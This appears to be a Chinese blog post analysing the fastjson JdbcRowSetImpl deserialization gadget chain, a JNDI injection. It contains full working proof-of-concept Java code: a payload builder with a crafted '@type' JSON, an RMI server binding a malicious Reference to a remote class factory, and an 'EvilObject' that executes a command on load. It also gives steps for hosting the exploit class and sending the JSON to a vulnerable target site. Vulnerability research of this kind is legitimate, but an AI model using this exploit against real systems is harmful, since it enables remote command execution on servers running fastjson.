fastjson反序列化-JdbcRowSetImpl利用鏈

fastjson反序列化-JdbcRowSetImpl利用鏈

JdbcRowSetImpl利用鏈

fastjson反序列化JdbcRowSetImpl - Afant1 - 部落格園 (cnblogs.com)

這裡涉及了JNDI與RMI的概念。

其本質為JNDI注入。

附上示例程式碼

JdbcRowSetImplPoC.java

package org.lain.poc.poclist;

import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

/**
 * @author: ZH3FENG
 * @Date: 下午7:53 2017/12/11
 * @Modified By:
 * @Description: Gadget com.sun.rowset.JdbcRowSetImpl
 *
 *               setAutoCommit() -> connect() -> InitialContext.lookup()
 */
public class JdbcRowSetImplPoC {


    public static void testJdbcRowSetImpl(String dataSourceName){

        ParserConfig config = new ParserConfig();

        config.setAutoTypeSupport(true);//


        String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","
                + "\"dataSourceName\":\"" + dataSourceName + "\","
                + "\"autoCommit\":\"true\"}";
        System.out.println(payload);

        try{
            JSONObject.parse(payload,config);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

RMIServer.java

package org.lain.poc.jndi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * @author: lanqihe
 * @Date: 下午8:01 2017/12/11
 * @Modified By:
 * @Description: 本地註冊一個register，並將惡意的類繫結
 */
public class RMIServer {


    public static void main(String argv[]) {

        try {
            Registry  registry =  LocateRegistry.createRegistry(1090);

            //如果通過rmi無法找到org.lain.poc.jndi.EvilObjectFactory，則嘗試從factoryLocation 獲取
            //因此，本地測試的話，如果factory正確，factoryLocation隨便填
            //把一個物件繫結到rmi登錄檔中，這個物件需要繼承UnicastRemoteObject，但是Reference沒有繼承它，所以我們還需要封裝一下它，用 ReferenceWrapper 包裹一下Reference例項物件，這樣就可以將其繫結到rmi登錄檔，並被遠端訪問到了
            Reference reference = new Reference("EvilObject",
                    "org.lain.poc.jndi.EvilObjectFactory",
                    "http://localhost:9999/" );


            //客戶端通過evil查詢，獲取到EvilObject
            registry.bind("evil", new ReferenceWrapper(reference));

            System.out.println("Ready!");
            System.out.println("Waiting for connection......");

        } catch (Exception e) {
            System.out.println("RMIServer: " + e.getMessage());
            e.printStackTrace();
        }
    }
}

EvilObject.java

package org.lain.poc.jndi;


import java.io.IOException;

/**
 * @author: ZH3FENG
 * @Date: 上午10:18 2017/12/12
 * @Modified By:
 * @Description: 模擬一個惡意類，靜態程式碼塊執行命令
 */
public class EvilObject {


    public EvilObject(){
        System.out.println("Hi!");
    }
    /**
     * 簡單的命令執行
     */
    static {
        try {
            Runtime.getRuntime().exec("calc");
        }catch (IOException e){
            //ignore
        }
    }
}

我們在JSONObject.parse方法下斷點除錯

還是呼叫了parse.Object,步入

呼叫deserialze方法，進行反序列化

接下來會對JdbcRowSetImpl進行 初始化

在呼叫完建構函式後，parseObject還會去呼叫set方法。

根據poc的欄位，可以在setDataSourceName與setAutoCommit下斷點。

發現確實呼叫了這兩個函式，在setDataSourceName方法中設定了資料來源，setAutoCommit方法中，呼叫了connect方法。

connect方法

lookup方法

decodeObject中就是解析reference，之後呼叫getOnjectInstance去例項化物件。

呼叫流程總結：

具體利用方法：

Fastjson反序列化漏洞利用 - 簡書 (jianshu.com)

搭建一個rmi伺服器和一個http伺服器

將exp類部署到http伺服器上。

如果目標網站存在fastjson包，且有json格式資料的輸入點。則可以構造json資料，達到遠端呼叫http伺服器上的類，造成命令執行。